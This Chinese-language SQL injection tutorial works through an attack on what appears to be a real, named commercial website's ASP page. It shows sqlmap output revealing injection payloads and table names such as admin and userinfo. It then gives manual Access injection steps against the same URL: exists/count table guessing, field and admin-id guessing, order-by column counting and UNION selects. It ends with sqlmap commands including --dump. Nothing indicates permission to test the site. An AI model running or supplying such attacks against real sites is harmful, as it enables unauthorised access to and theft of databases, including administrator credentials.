(一)猜解表名
root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 --tables
___
__H__
___ ___[,]_____ ___ ___ {1.2.6#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:00:41

[10:00:41] [INFO] resuming back-end DBMS 'microsoft access'
[10:00:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=14 AND 8567=8567

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-6399 UNION ALL SELECT NULL,CHR(113)&CHR(122)&CHR(122)&CHR(122)&CHR(113)&CHR(119)&CHR(100)&CHR(73)&CHR(84)&CHR(66)&CHR(104)&CHR(105)&CHR(113)&CHR(69)&CHR(113)&CHR(106)&CHR(101)&CHR(79)&CHR(78)&CHR(76)&CHR(79)&CHR(80)&CHR(122)&CHR(80)&CHR(116)&CHR(97)&CHR(120)&CHR(70)&CHR(116)&CHR(108)&CHR(68)&CHR(119)&CHR(110)&CHR(66)&CHR(107)&CHR(85)&CHR(108)&CHR(115)&CHR(97)&CHR(101)&CHR(86)&CHR(113)&CHR(77)&CHR(84)&CHR(81)&CHR(113)&CHR(98)&CHR(118)&CHR(112)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
[10:00:42] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[10:00:42] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[10:00:42] [WARNING] the SQL query provided does not return any output
[10:00:42] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[10:00:42] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[10:00:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:00:42] [INFO] retrieved:
[10:00:42] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[10:00:42] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[10:00:42] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q] y
which common tables (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/txt/common-tables.txt' (press Enter)
[2] custom
> 1
[10:00:45] [INFO] checking table existence using items from '/usr/share/sqlmap/txt/common-tables.txt'
[10:00:45] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[10:00:47] [INFO] starting 10 threads
[10:00:50] [INFO] retrieved:
admin
[10:00:51] [INFO] retrieved: news
[10:00:54] [INFO] retrieved: userinfo
Database: Microsoft_Access_masterdb
[3 tables]
+----------+
| admin |
| news |
| userinfo |
+----------+

[10:03:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3157 times
[10:03:22] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.kfzhongzhou.com'

[*] shutting down at 10:03:22

猜到的表名:admin news userinfo admin是管理员 news是新闻 userinfo用户配置
Access手工注入(猜表)
(1)and 0<>(select count(*) from 表名)
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and 0<>(select count(*) from admin)

(<>:不等于), count是统计的函数,统计表中的所有字段。如果admin不存在,那么(select count(*) from admin)为假,即0.则0<>0(0不等于0),为假,所以导致返回结果出错。若存在admin,则0<>1成立,结果为真。
(2)and exists (select * from 表名)
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and exists (select * from admin)

exists:指定一个子查询,检测行的存在。返回的结果类型为布尔型。
and exists (select from admin):用exists判断select from admin的结果是否为真。
select * from admin:查询admin表里面的全部数据。
注:exists不能猜内容,猜admin表的内容:and (select * from admin)
来判断此数据库是否存在admin表,若存在,就返回正常,反之错误。
(二)猜解字段
(1)在注入点后面加 and exists (select id from admin),若页面返回正常,就说明admin 表里存在id这个字段。然后输入 and exists (select username from admin)和and exists (select password from admin),均返回正常的话,就说明存在username和password字段。
列如:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and exists (select id from admin)
(2)在注入点后面加 and exists (select id from admin where id=1),若返回错误页面,就说 明不存在id=1的帐号,然后继续猜id=2。直到返回正常的页面
列如:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 and exists (select id from admin where id=81)
admin用户的id为81为正常
(3)猜解长度
在注入点后面加上 order by N # N为数字但是不能为0
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 order by 6
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 order by 7的时候页面报错。
Microsoft JET Database Engine 错误 '80040e14'
Microsoft Jet 数据库引擎不能将 '7' 识别为一个有效的字段名或表达式。
/cyjb_xx.asp,行 69

Microsoft Jet数据库引擎不能将7识别为一个有效的字段名货表达式。
说明长度为6
(4)猜解内容
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 union select 1,2,3,4,5,6 from admin
返回2和5
http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 union select 1,id.3.4.5.6 from admin
查询id字段里面的内容
本章sqlmap的语句总结:
root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14
root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 --tables
root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 --columns -T admin
root@instance-ce9256h8:~# sqlmap -u http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 --dump

0

正因为生来什么都没有,因此我们能拥有一切。